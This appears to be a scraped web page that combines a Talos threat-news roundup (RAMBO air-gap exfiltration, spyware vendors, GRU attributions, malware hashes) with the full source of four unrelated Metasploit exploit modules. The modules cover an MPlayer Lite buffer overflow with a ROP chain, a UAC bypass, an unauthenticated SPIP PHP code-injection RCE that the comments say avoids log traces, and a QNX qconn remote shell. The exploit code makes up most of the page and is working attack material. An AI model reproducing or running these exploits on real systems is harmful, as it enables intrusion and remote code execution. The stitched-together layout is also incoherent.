**A new type of attack called “RAMBO” could allow adversaries to steal data over air-gapped networks with RAM radio signals.** An Israeli academic researcher recently announced the discovery of RAMBO (Radiation of Air-gapped Memory Bus for Offense), in which an attacker could generate electromagnetic radiation from a device’s RAM to send data from air-gapped computers. Air-gapped systems are otherwise offline networks that are extremely isolated, often used in critical environments like government agencies, weapons systems and nuclear power stations. While RAMBO does not pose a threat for any hacker with access to the internet, it could open the door for insider threats with access to the network to deploy malware through physical media like USB drives or supply chain attacks. RAMBO could allow attackers to seal encoded files, encryption keys, images, keystrokes and biometric information from these systems at a rate of 1,000 bits per second. Researchers conducted tests into these types of attacks over distances of up to 23 feet. A technical paper published on the topic includes several potential mitigations, including RAM jamming, external EM jamming and Faraday enclosures around potentially targeted systems. (Bleeping Computer, SecurityWeek) 

**Commercial spyware makers are still finding ways to bypass government sanctions and, in some cases, have made their tools harder to detect.** A new report from the Atlantic Council found that “Most available evidence suggests that spyware sales are a present reality and likely to continue.” The report specifically highlights increased activity from Intellexa and the NSO Group, two companies known for creating and selling spyware tools that have been targeted over the past few years by international sanctions. These companies, and specifically Intellexa, have found ways to work around sanctions by restructuring their businesses with subsidiaries, partners and other relationships spread across multiple geographic areas. Intellexa is known for creating the Predator spyware, while the NSO Group is infamous for the Pegasus spyware. Both pieces of software often target high-risk individuals, sometimes by governments, such as journalists, politicians and activists. Security researchers also recently found that Intellexa has established new infrastructure in the Democratic Republic of the Congo and Angola, making “it more difficult for researchers and cybersecurity defenders to track the spread of Predator.” (Dark Reading, The Register) 

**Several Western intelligence agencies have formally charged the Russian GRU for carrying out cyber attacks against Ukraine designed to disrupt aid efforts.** Government agencies in the U.S., U.K. and several other countries blamed Unit 29155, which has been linked to past espionage campaigns, with targeting government and civilian agencies and civil society organizations in Western Europe, the EU and NATO after Russia invaded Ukraine in 2022. Intelligence agencies in the Netherlands, Czech Republic, Germany, Estonia, Latvia, Canada and Australia all signed the declaration. They also formally blamed Unit 29155 for the WhisperGate campaign, a coordinated attack on Ukrainian government agencies in January 2022 that seemed to set the stage for a physical ground invasion. The announcement stated that WhisperGate has since been used to “scout and disrupt” aid deliveries to Ukraine. When Talos first reported on WhisperGate in 2022, our researchers stated that “attackers used stolen credentials in the campaign and they likely had access to the victim network for months before the attack, a typical characteristic of sophisticated advanced persistent threat (APT) operations.” (Reuters, BBC) 

**Can’t get enough Talos? **

*   The 2024 Threat Landscape State of Play 
*   Vulnerability in Tencent WeChat custom browser could lead to remote code execution 
*   Watch our new documentary, "The Light We Keep: A Project PowerUp Story" 
*   Vulnerability in Acrobat Reader could lead to remote code execution; Microsoft patches information disclosure issue in Windows API 
*   Four zero-days included in group of 79 vulnerabilities Microsoft discloses, including one with 9.8 severity score 

**Upcoming events where you can find Talos **

**LABScon** **(Sept. 18 - 21)**  

_Scottsdale, Arizona_ 

**VB2024** **(Oct. 2 - 4)** 

_Dublin, Ireland_ 

**MITRE ATT&CKcon 5.0** **(Oct. 22 - 23)** 

_McLean, Virginia and Virtual_

Nicole Hoffman and James Nutland will provide a brief history of Akira ransomware and an overview of the Linux ransomware landscape. Then, morph into action as they take a technical deep dive into the latest Linux variant using the ATT&CK framework to uncover its techniques, tactics and procedures.

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca   
**MD5:** 71fea034b422e4a17ebb06022532fdde   
**Typical Filename:** VID001.exe   
**Claimed Product:** N/A   
**Detection Name:** RF.Talos.80 

**SHA 256:** 3a2ea65faefdc64d83dd4c06ef617d6ac683f781c093008c8996277732d9bd66   
**MD5:** 8b84d61bf3ffec822e2daf4a3665308c   
**Typical Filename:** RemComSvc.exe   
**Claimed Product:** N/A   
**Detection Name:** W32.3A2EA65FAE-95.SBX.TG 

**SHA 256:** 35dcf857f0bb2ea75bf4582b67a2a72d7e21d96562b4c8a61b5d598bd2327c2c   
**MD5:** fab8aabfdabe44c9a1ffa779fda207db   
**Typical Filename:** ACenter.exe   
**Claimed Product:** Aranda AGENT   
**Detection Name:** Win.Trojan.Generic::tg.talos  

**SHA 256:** 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647   
**MD5:** bbcf7a68f4164a9f5f5cb2d9f30d9790   
**Typical Filename:** bbcf7a68f4164a9f5f5cb2d9f30d9790.vir   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::1201 

**SHA 256:** 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf   
**MD5:** 2cfc15cb15acc1ff2b2da65c790d7551   
**Typical Filename:** rcx4d83.tmp   
**Claimed Product:** N/A     
**Detection Name:** Win.Dropper.Pykspa::tpd

We can try to bridge the cybersecurity skills gap, but that doesn’t necessarily mean more jobs for defenders

This Metasploit module exploits a stack-based buffer overflow vulnerability in MPlayer Lite r33064, caused by improper bounds checking of an URL entry. By persuading the victim to open a specially-crafted .M3U file, specifically by drag-and-dropping it to the player, a remote attacker can execute arbitrary code on the system.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = AverageRanking  include Msf::Exploit::FILEFORMAT  include Msf::Exploit::Seh  def initialize(info = {})    super(update_info(info,      'Name'           => 'MPlayer Lite M3U Buffer Overflow',      'Description'    => %q{        This module exploits a stack-based buffer overflow vulnerability in        MPlayer Lite r33064, caused by improper bounds checking of an URL entry.        By persuading the victim to open a specially-crafted .M3U file, specifically by        drag-and-dropping it to the player, a remote attacker can execute arbitrary        code on the system.      },      'License'        => MSF_LICENSE,      'Author'         =>        [          'C4SS!0 and h1ch4m', # Vulnerability discovery and original exploit          'Gabor Seljan',      # Metasploit module        ],      'References'     =>        [          [ 'BID', '46926' ],          [ 'EDB', '17013' ],          [ 'URL', 'http://www.mplayer-ww.com/eng/' ]        ],      'DefaultOptions' =>        {          'EXITFUNC' => 'thread'        },      'Platform'       => 'win',      'Payload'        =>        {          'BadChars'   => "\x00\x20\x0d\x0a\x1a\x2c\x2e\x26\x2f\x3a\x3e\x3f\x5c",          'Space'      => 5040        },      'Targets'        =>        [          [ 'Windows XP SP3 (DEP Bypass) / MPlayer Lite r33064',            {              'Offset' => 21,              'Ret'    => 0x649a7bbe  # ADD ESP,64C # PPPR [avformat-52.dll]            }          ],        ],      'Privileged'     => false,      'DisclosureDate' => '2011-03-19',      'DefaultTarget'  => 0))      register_options(        [          OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u'])        ],      self.class)  end  def junk    return rand_text_alpha(4).unpack("V").first  end  def nops    return make_nops(4).unpack("V").first  end  def exploit    # ROP chain generated by mona.py - See corelan.be    rop_gadgets =    [      0x6ad9d85d,  # POP EBP # RETN [avcodec-52.dll]      0x10018fc3,  # &CALL ESP [unrar.dll]      0x64984a70,  # POP EAX # RETN [avformat-52.dll]      0xffffec4f,  # Value to negate, will become 0x00005040      0x6b0ce791,  # NEG EAX # RETN [avcodec-52.dll]      0x6b063c7d,  # PUSH EAX # POP EBX # POP ESI # POP EDI # RETN [avcodec-52.dll]      junk,      junk,      0x1001d154,  # POP EAX # RETN [unrar.dll]      0x77e71210,  # &VirtualProtect() [IAT RPCRT4.dll]      0x64987f7f,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [avformat-52.dll]      0x6afcdc68,  # XCHG EAX,ESI # RETN [avcodec-52.dll]      0x6b02836d,  # POP EAX # RETN [avcodec-52.dll]      0xffffffc0,  # Value to negate, will become 0x00000040      0x6b0ce791,  # NEG EAX # RETN [avcodec-52.dll]      0x6af79d80,  # XCHG EAX,EDX # RETN [avcodec-52.dll]      0x1001bad6,  # POP ECX # RETN [unrar.dll]      0x649eab48,  # &Writable location [avformat-52.dll]      0x6d7c0bb7,  # POP EDI # RETN [swscale-0.dll]      0x6b03d722,  # RETN (ROP NOP) [avcodec-52.dll]      0x64984a70,  # POP EAX # RETN [avformat-52.dll]      nops,      0x6d7c57d1   # PUSHAD # RETN [swscale-0.dll]    ].flatten.pack('V*')    sploit =  rand_text_alpha_upper(target['Offset'])    sploit << rop_gadgets    sploit << payload.encoded    sploit << generate_seh_record(target.ret)    sploit << rand_text_alpha_upper(1000) # Generate exception    # Create the file    print_status("Creating '#{datastore['FILENAME']}' file ...")    file_create("http://" + sploit)  endend

MPlayer Lite r33064 Buffer Overflow

This Metasploit module will attempt to elevate execution level using the ShellExecute undocumented RunAs flag to bypass low UAC settings.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Post::Windows::Priv  include Post::Windows::Runas  def initialize(info = {})    super(update_info(info,      'Name'          => 'Windows Escalate UAC Execute RunAs',      'Description'   => %q(        This module will attempt to elevate execution level using        the ShellExecute undocumented RunAs flag to bypass low        UAC settings.      ),      'License'       => MSF_LICENSE,      'Author'        => [        'mubix', # Original technique        'b00stfr3ak' # Added powershell option      ],      'Platform'      => ['win'],      'SessionTypes'  => ['meterpreter'],      'Targets'       => [['Windows', {}]],      'DefaultTarget' => 0,      'DisclosureDate' => '2012-01-03'    ))    register_options([      OptString.new('FILENAME', [false, 'File name on disk']),      OptString.new('PATH', [false, 'Location on disk, %TEMP% used if not set']),      OptEnum.new('TECHNIQUE', [true, 'Technique to use', 'EXE', %w(PSH EXE)]),    ])  end  def exploit    if is_uac_enabled?      print_status 'UAC is Enabled, checking level...'      case get_uac_level      when UAC_NO_PROMPT        print_good 'UAC is not enabled, no prompt for the user'      else        print_status "The user will be prompted, wait for them to click 'Ok'"      end    else      print_good 'UAC is not enabled, no prompt for the user'    end    case datastore['TECHNIQUE']    when 'EXE'      shell_execute_exe(datastore['FILENAME'], datastore['PATH'])    when 'PSH'      shell_execute_psh    end  endend

Windows Escalate UAC Execute RunAs

This Metasploit module exploits a Remote Code Execution vulnerability in the BigUp plugin of SPIP. The vulnerability lies in the lister_fichiers_par_champs function, which is triggered when the bigup_retrouver_fichiers parameter is set to any value. By exploiting the improper handling of multipart form data in file uploads, an attacker can inject and execute arbitrary PHP code on the target server. This critical vulnerability affects all versions of SPIP from 4.0 up to and including 4.3.1, 4.2.15, and 4.1.17. It allows unauthenticated users to execute arbitrary code remotely via the public interface. The vulnerability has been patched in versions 4.3.2, 4.2.16, and 4.1.18.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Payload::Php  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::Spip  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'SPIP BigUp Plugin Unauthenticated RCE',        'Description' => %q{          This module exploits a Remote Code Execution vulnerability in the BigUp plugin of SPIP.          The vulnerability lies in the `lister_fichiers_par_champs` function, which is triggered          when the `bigup_retrouver_fichiers` parameter is set to any value. By exploiting the improper          handling of multipart form data in file uploads, an attacker can inject and execute          arbitrary PHP code on the target server.          This critical vulnerability affects all versions of SPIP from 4.0 up to and including          4.3.1, 4.2.15, and 4.1.17. It allows unauthenticated users to execute arbitrary code          remotely via the public interface. The vulnerability has been patched in versions          4.3.2, 4.2.16, and 4.1.18.        },        'Author' => [          'Vozec',            # Vulnerability Discovery          'Laluka',           # Vulnerability Discovery          'Julien Voisin',    # Code Review          'Valentin Lobstein' # Metasploit Module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2024-8517'],          ['URL', 'https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_2_a_big_upload/'],          ['URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-2-SPIP-4-2-16-SPIP-4-1-18.html']        ],        'Platform' => %w[php unix linux win],        'Arch' => %w[ARCH_PHP ARCH_CMD],        'Targets' => [          [            'PHP In-Memory', {              'Platform' => 'php',              'Arch' => ARCH_PHP              # tested with php/meterpreter/reverse_tcp            }          ],          [            'Unix/Linux Command Shell', {              'Platform' => %w[unix linux],              'Arch' => ARCH_CMD              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp            }          ],          [            'Windows Command Shell', {              'Platform' => 'win',              'Arch' => ARCH_CMD              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp            }          ]        ],        'DefaultTarget' => 0,        'Privileged' => false,        'DisclosureDate' => '2024-09-06',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        OptString.new('FORM_PAGE', [true, 'A page with a form.', 'Auto'])      ]    )  end  def check    rversion = spip_version || spip_plugin_version('spip')    return Exploit::CheckCode::Unknown('Unable to determine the version of SPIP') unless rversion    print_status("SPIP Version detected: #{rversion}")    vulnerable_ranges = [      { start: Rex::Version.new('4.0.0'), end: Rex::Version.new('4.1.17') },      { start: Rex::Version.new('4.2.0'), end: Rex::Version.new('4.2.15') },      { start: Rex::Version.new('4.3.0'), end: Rex::Version.new('4.3.1') }    ]    is_vulnerable = vulnerable_ranges.any? { |range| rversion.between?(range[:start], range[:end]) }    unless is_vulnerable      return CheckCode::Safe("The detected SPIP version (#{rversion}) is not vulnerable.")    end    print_good("SPIP version #{rversion} is vulnerable.")    plugin_version = spip_plugin_version('bigup')    unless plugin_version      print_warning('Could not determine the version of the bigup plugin.')      return CheckCode::Appears("The detected SPIP version (#{rversion}) is vulnerable.")    end    print_status("Bigup plugin version detected: #{plugin_version}")    if plugin_version < Rex::Version.new('3.2.12')      return CheckCode::Appears("Both the detected SPIP version (#{rversion}) and bigup version (#{plugin_version}) are vulnerable.")    end    CheckCode::Appears("The detected SPIP version (#{rversion}) is vulnerable.")  end  # This function tests several pages to find a form with a valid CSRF token and its corresponding action.  # It allows the user to specify a URL via the FORM_PAGE option (e.g., spip.php?article1).  # We need to check multiple pages because the configuration of SPIP can vary.  def get_form_data    pages = %w[login spip_pass contact]    if datastore['FORM_PAGE']&.downcase != 'auto'      pages = [datastore['FORM_PAGE']]    end    pages.each do |page|      url = normalize_uri(target_uri.path, page.start_with?('/') ? page : "spip.php?page=#{page}")      res = send_request_cgi('method' => 'GET', 'uri' => url)      next unless res&.code == 200      doc = res.get_html_document      action = doc.at_xpath("//input[@name='formulaire_action']/@value")&.text      args = doc.at_xpath("//input[@name='formulaire_action_args']/@value")&.text      next unless action && args      print_status("Found formulaire_action: #{action}")      print_status("Found formulaire_action_args: #{args[0..20]}...")      return { action: action, args: args }    end    nil  end  # This function generates PHP code to execute a given payload on the target.  # We use Rex::RandomIdentifier::Generator to create a random variable name to avoid conflicts.  # The payload is encoded in base64 to prevent issues with special characters.  # The generated PHP code includes the necessary preamble and system block to execute the payload.  # This approach allows us to test multiple functions and not limit ourselves to potentially dangerous functions like 'system' which might be disabled.  def php_exec_cmd(encoded_payload)    vars = Rex::RandomIdentifier::Generator.new    dis = "$#{vars[:dis]}"    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)    <<-END_OF_PHP_CODE              #{php_preamble(disabled_varname: dis)}              $c = base64_decode("#{encoded_clean_payload}");              #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}    END_OF_PHP_CODE  end  def exploit    form_data = get_form_data    unless form_data      fail_with(Failure::NotFound, 'Could not retrieve formulaire_action or formulaire_action_args value from any page.')    end    print_status('Preparing to send exploit payload to the target...')    phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)    b64_payload = framework.encoders.create('php/base64').encode(phped_payload).gsub(';', '')    post_data = Rex::MIME::Message.new    # This line is necessary for the form to be valid, works in tandem with formulaire_action_args    post_data.add_part(form_data[:action], nil, nil, 'form-data; name="formulaire_action"')    # This value is necessary for $_FILES to be used and for the bigup plugin to be "activated" for this request, thus triggering the vulnerability    post_data.add_part(Rex::Text.rand_text_alphanumeric(4, 8), nil, nil, 'form-data; name="bigup_retrouver_fichiers"')    # Injection is performed here. The die() function is used to avoid leaving traces in the logs,    # prevent errors, and stop the execution of PHP after the injection.    post_data.add_part('', nil, nil, "form-data; name=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}['.#{b64_payload}.die().']\"; filename=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}\"")    # This is necessary for the form to be accepted    post_data.add_part(form_data[:args], nil, nil, 'form-data; name="formulaire_action_args"')    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'spip.php'),      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",      'data' => post_data.to_s    }, 1)  endend

SPIP BigUp 4.3.1 / 4.2.15 / 4.1.17 Unauthenticated Remote Code Execution

This Metasploit module uses the qconn daemon on QNX systems to gain a shell. The QNX qconn daemon does not require authentication and allows remote users to execute arbitrary operating system commands. This Metasploit module has been tested successfully on QNX Neutrino 6.5.0 (x86) and 6.5.0 SP1 (x86).

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::Tcp  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'QNX qconn Command Execution',        'Description' => %q{          This module uses the qconn daemon on QNX systems to gain a shell.          The QNX qconn daemon does not require authentication and allows          remote users to execute arbitrary operating system commands.          This module has been tested successfully on QNX Neutrino 6.5.0 (x86)          and 6.5.0 SP1 (x86).        },        'License' => MSF_LICENSE,        'Author' => [          'David Odell', # Discovery          'Mor!p3r', # PoC          'bcoles' # Metasploit        ],        'References' => [          ['EDB', '21520'],          ['URL', 'https://www.optiv.com/blog/pentesting-qnx-neutrino-rtos'],          ['URL', 'http://www.qnx.com/developers/docs/6.5.0SP1/neutrino/utilities/q/qconn.html'],          ['URL', 'http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.neutrino_utilities/q/qconn.html']        ],        'Payload' => {          'BadChars' => '',          'DisableNops' => true,          'Compat' => {            'PayloadType' => 'cmd_interact',            'ConnectionType' => 'find'          }        },        'DefaultOptions' => {          'WfsDelay' => 10,          'PAYLOAD' => 'cmd/unix/interact'        },        'Platform' => 'unix', # QNX Neutrino        'Arch' => ARCH_CMD,        'Targets' => [['Automatic', {}]],        'Privileged' => false,        'DisclosureDate' => '2012-09-04',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => []        }      )    )    register_options(      [        Opt::RPORT(8000),        OptString.new('SHELL', [true, 'Path to system shell', '/bin/sh'])      ]    )  end  def check    vprint_status('Sending check...')    connect    res = sock.get_once(-1, 10)    return CheckCode::Unknown('Connection failed') unless res    return CheckCode::Safe unless res.include?('QCONN')    sock.put("service launcher\n")    res = sock.get_once(-1, 10)    return CheckCode::Safe unless res.to_s.include?('OK')    fingerprint = Rex::Text.rand_text_alphanumeric(5..10)    sock.put("start/flags run /bin/echo /bin/echo #{fingerprint}\n")    return CheckCode::Safe unless res.to_s.include?('OK')    Rex.sleep(1)    res = sock.get_once(-1, 10)    return CheckCode::Safe unless res.to_s.include?(fingerprint)    disconnect    CheckCode::Vulnerable  end  def exploit    connect    res = sock.get_once(-1, 10)    fail_with(Failure::Unreachable, 'Connection failed') unless res    fail_with(Failure::UnexpectedReply, 'Unexpected reply') unless res.include?('QCONN')    sock.put("service launcher\n")    res = sock.get_once(-1, 10)    fail_with(Failure::UnexpectedReply, 'Unexpected reply') unless res.to_s.include?('OK')    print_status('Sending payload...')    sock.put("start/flags run #{datastore['SHELL']} -\n")    Rex.sleep(1)    fail_with(Failure::UnexpectedReply, 'Shell negotiation failed. Unexpected reply.') unless negotiate_shell(sock)    print_good('Payload sent successfully')    handler  end  def negotiate_shell(sock)    Timeout.timeout(15) do      loop do        data = sock.get_once(-1, 10)        return if data.blank?        if data.include?('#') || data.include?('No controlling tty')          return true        end        Rex.sleep(0.5)      end    end  rescue ::Timeout::Error    return nil  endend

Tag

#git